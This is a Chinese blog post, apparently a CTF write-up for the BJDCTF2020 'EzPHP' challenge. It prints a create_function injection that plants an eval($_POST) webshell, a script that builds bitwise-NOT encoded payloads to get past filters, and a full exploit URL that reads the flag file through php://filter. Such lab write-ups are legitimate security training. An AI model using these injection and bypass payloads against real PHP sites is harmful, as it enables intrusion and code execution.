2021-8-23 [BJDCTF2020]EzPHP 知识点:php超全局变量,create_function,各种php的bypass

最新推荐文章于 2023-06-28 16:24:02 发布
最新推荐文章于 2023-06-28 16:24:02 发布
阅读量309 收藏 1
点赞数 2
分类专栏: webctf 文章标签: php post web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51326092/article/details/119877080
版权

首先,本文借鉴的大老婆博客如下:
出题大佬博客,详细讲解了各种知识点
一位大佬的详细解题过程(偷懒,自己就不写了)

就简单写写(赋值粘贴)一些比较重要的知识点(×

create_function函数:
看似平平无常,却暗藏杀机

<?php
$myFunc = create_function('$a, $b', 'return($a+$b);}eval($_POST['Y1ng']);\\');
?>

执行后,很明显有一句话注入,可以拿到权限

function myFunc($a, $b){
	return $a+$b;
}
eval($_POST['Y1ng']);//}

超全局变量:$_REQUEST
$_REQUEST 详解
总结就是:
当同时get和post同一个变量时,post>get,所以post的值会覆盖get的值

由于找不到将数字和英文字母url编码的网址(全是不编码的),就自己写了一个:

from urllib import parse
a="666c6167"
index=0
for i in a:
    index=index+1
    if(index%2==0):
        print(i,end='')
    else :
        print("%",end='')
        print(i,end='')

print("\n")
b="lp;.;,;[;;'"
b=parse.quote(b)
print(b)

遇到两次的知识点:字符串取反后再url编码
这个可以绕过一些特别的过滤,是个好东西,代码如下:

<?php
$a="assert";
$a=urlencode(~$a);
print($a)."\n";
$b='php://filter/read=convert.base64-encode/resource=rea1fl4g.php';
$b=urlencode(~$b);
print($b)."\n";
$url="http://c56291a0-7cdc-4722-9875-364186d0101f.node4.buuoj.cn:81/?code=";
$paylod='(~'.$a.')'.'(~'.$b.');';
print($url.$paylod);
?>

最后的payload:

http://5b46e78d-4fd8-47ec-b82f-dc63449b28ec.node4.buuoj.cn:81/1nD3x.php?%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a&file=data://text/plain,%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61&%73%68%61%6e%61[]=1&%70%61%73%73%77%64[]=2&%66%6c%61%67[%61%72%67]=}require(~%8F%97%8F%C5%D0%D0%99%96%93%8B%9A%8D%D0%8D%9A%9E%9B%C2%9C%90%91%89%9A%8D%8B%D1%9D%9E%8C%9A%C9%CB%D2%9A%91%9C%90%9B%9A%D0%8D%9A%8C%90%8A%8D%9C%9A%C2%8D%9A%9E%CE%99%93%CB%98%D1%8F%97%8F);var_dump(get_defined_vars());//&%66%6c%61%67[%63%6f%64%65]=create_function
//
编码前:
get:http://5b46e78d-4fd8-47ec-b82f-dc63449b28ec.node4.buuoj.cn:81/1nD3x.php?debu=aqua_is_cute%0a&file=data://text/plain,debu_debu_aqua&shana[]=1&passwd[]=2&flag[arg]=}require(php://filter/read=convert.base64-encode/resource=rea1fl4g.php);//&flag[arg]=create_function
同时需要post:debu=1&file=1

Sakura-501
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
PHP学习笔记8:函数
梦幻天空
12-05 993
PHP学习笔记8:函数 图源:php.net 定义 php的函数可以定义在任何地方,甚至是条件语句中: function create_func(int $num){ if ($num<10){ function test(){ echo "test function is called".PHP_EOL; echo "the \$num < 10"; } } else{ f
create function php,php中的eval()与create_function()
weixin_33348983的博客
03-09 145
* eval()与create_function()* 一、eval()* 1.eval()函数把字符串按照 PHP 代码来计算* 2.该字符串必须是合法的 PHP 代码,且必须以分号结尾* 3.如果没有在代码字符串中调用 return 语句,则返回 NULL* 4.如果代码中存在解析错误,则 eval() 函数返回 false* 5.该函数对于在数据库文本字段中供日后计算而进行的代码存储很有用*...
[php代码审计]之create_function()函数
o3Ev的博客
04-14 1604
[php代码审计]之create_function 这篇文章结合了许多师傅的博客,再加上了一点我自己的心得 文章目录creat_function()介绍使用官方手册使用实际例子0x010x02代码分析参考博客 creat_function()介绍 适用范围:php4>=4.0.1,php5,php7 功能: 根据传递的参数创建匿名函数,并为其返回唯一名称 语法: creat_function(string $agrs,string $code) //string $agrs 声明的函数变量部分 //s
php 命名空间 create_function,PHP create_function()注入命令执行漏洞
weixin_39716044的博客
03-21 403
0x00 create_function()介绍create_function()创建匿名函数string create_function ( string $args , string $code )stringcode 方法代码部分举例:create_function('$name','echo $name."A"')类似于:function name($name) {echo ...
全网最全的 php8 新特性
国内某知名游戏公司小菜鸡工程师
06-01 5946
全世界最好的语言又升级了,快来看看有哪些新特性
PHP代码 之create_function()函数
snowlyzz的博客
10-05 4130
create_function 详解
Bypass-PHP-GD-Process-To-RCE:参考
06-14
绕过-PHP-GD-Process-To-RCE 描述 使用 Similar-Block-Attack 绕过 PHP-GD 进程到 RCE。 用法 用法: php codeinj.php <src> <inj> php codeinj.php demo.gif "<?php phpinfo();?>" 然后新图像“gd_demo.gif...
php马-bypass _ alin'Blog1
08-03
例如,`register_shutdown_function`结合`assert`可以构造出一个隐秘的后门,但某些检测工具(如安全狗)仍能识别这类技巧。 0x03 回调函数与绕过策略 回调函数如`register_shutdown_function`、`array_map`等可...
「数据治理」Liar_Game:The_Secret_of_Mitigation_Bypass_Techniques -
12-04
「数据治理」Liar_Game:The_Secret_of_Mitigation_Bypass_Techniques - 区块链 Android 安全资讯 防火墙 Web安全 数据分析
hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip
05-20
标题 "hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip" 指向的是一个与海康威视(Hikvision)设备相关的安全漏洞,具体是CVE-2017-7921认证绕过漏洞。这个压缩包可能包含一个工具或指南,用于解析...
Qualcomm-BYPASS-2021-for-test-main_bypassauth_
10-02
【标题】"Qualcomm BYPASS 2021 for Test - Main Bypassauth" 涉及的关键技术点主要集中在高通(Qualcomm)处理器的安全认证机制和绕过方法。在2021年,安全研究人员或黑客可能发现了一种新的方法来规避Qualcomm...
PHPcreate_function的用法总结
azzfanke的专栏
12-22 7784
php中,函数create_function主要用来创建匿名函数,有时候匿名函数可以发挥它的作用。 1.测试一 测试一主要用来循环替换数组中多个值的,我们用array_map加上create_function解决这个问题。 ############################################### function filterChars($a) {
BJDCTF 2nd-WP
luoluopeach
03-23 711
Crypto 1.签到-y1ng 直接base64解码 QkpEe1czbGMwbWVfVDBfQkpEQ1RGfQ== flag:BJD{W3lc0me_T0_BJDCTF} 2.老文盲了 将文字转化为拼音可以知道文字就是flag flag:BJD{罼雧締眔擴灝淛匶襫黼瀬鎶軄鶛驕鳓哵眔鞹鰝} 3.cat_flag ...
[BJDCTF2020]EzPHP
D.MIND 的博客
04-27 619
前言: 这道题很有意思,知识点多但都不是特别难的知识点,代码虽然多但都是 ”分段“ 的。总之做完真的学到很多 文章目录前言:一、`$_SERVER['QUERY_STRING']`的绕过二、`%0a`绕过正则三、同名变量下`$_REQUEST`的优先级四、绕过文件内容读取的比较五、 sha1()函数的绕过六、 `create_function()`代码注入读取另外一个文件取反绕过 + 伪协议读源码define + fopen ()+fgets ()总结 首先在源码中有一段GFXEIM3YFZYGQ4A=,这
[BJDCTF2020]EzPHP级详解
qq_72685284的博客
06-28 723
首先f12,base32解码一下,发现目录,这些都很简单关键是下面的,我在这里不是给大家讲如何拿到flag,我的重点是思路,和加深对这道题目的理解,所以可能有些啰嗦。咱们接下来一点点分析。
as_bypass_php_disable_functions-master
最新发布
09-17
as_bypass_php_disable_functions-master是一个可以绕过PHP禁用函数的项目。 在PHP中,禁用函数是一种安全措施,用于限制脚本执行时可以调用的函数。这样可以防止恶意代码的执行,提高服务器的安全性。 然而,有...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sakura-501

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值